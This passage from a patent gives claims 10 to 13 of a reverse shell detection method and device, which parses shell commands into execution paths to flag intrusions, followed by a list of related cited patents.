10. The method according to claim 1, wherein The first preset condition includes: There is a network node in the command execution path; There is an actuator node in the command execution path; And the network node is directly or indirectly connected to the actuator node.
11. A reverse shell detection device, comprising: An acquisition module, configured to: acquire a first shell command; An analysis module, configured to: perform syntax analysis on the first shell command to obtain the command execution intention for the first shell command; A path construction module, configured to: determine a command execution path corresponding to the first shell command based on the command execution intention; A detection module, configured to: in response to at least one node in the command execution path satisfying the first preset condition, determine whether the first shell command is a reverse shell intrusion command.
12. An electronic device, comprising a memory, a processor, and a computer program stored on the memory and executable on the processor, wherein when the processor executes the program, it implements the reverse shell detection method according to any one of claims 1 to 10.
13. A non-transitory computer-readable storage medium, the non-transitory computer-readable storage medium stores computer instructions, and the computer instructions are used to cause the computer to execute the reverse shell detection method according to any one of claims 1 to 10.
Citation Information
Patent Citations
Structure analysis method and device, electronic equipment and storage medium
CN113157597A
Shell command injection detection method based on flow analysis and semantic analysis
CN115913655A
Rebound shell process detection method and device, electronic equipment and storage medium
CN116566631A
Rebound shell detection method and device, electronic equipment and storage medium
CN117807595A
Method and apparatus for detecting network attack, terminal device, and computer storage medium
WO2018041114A1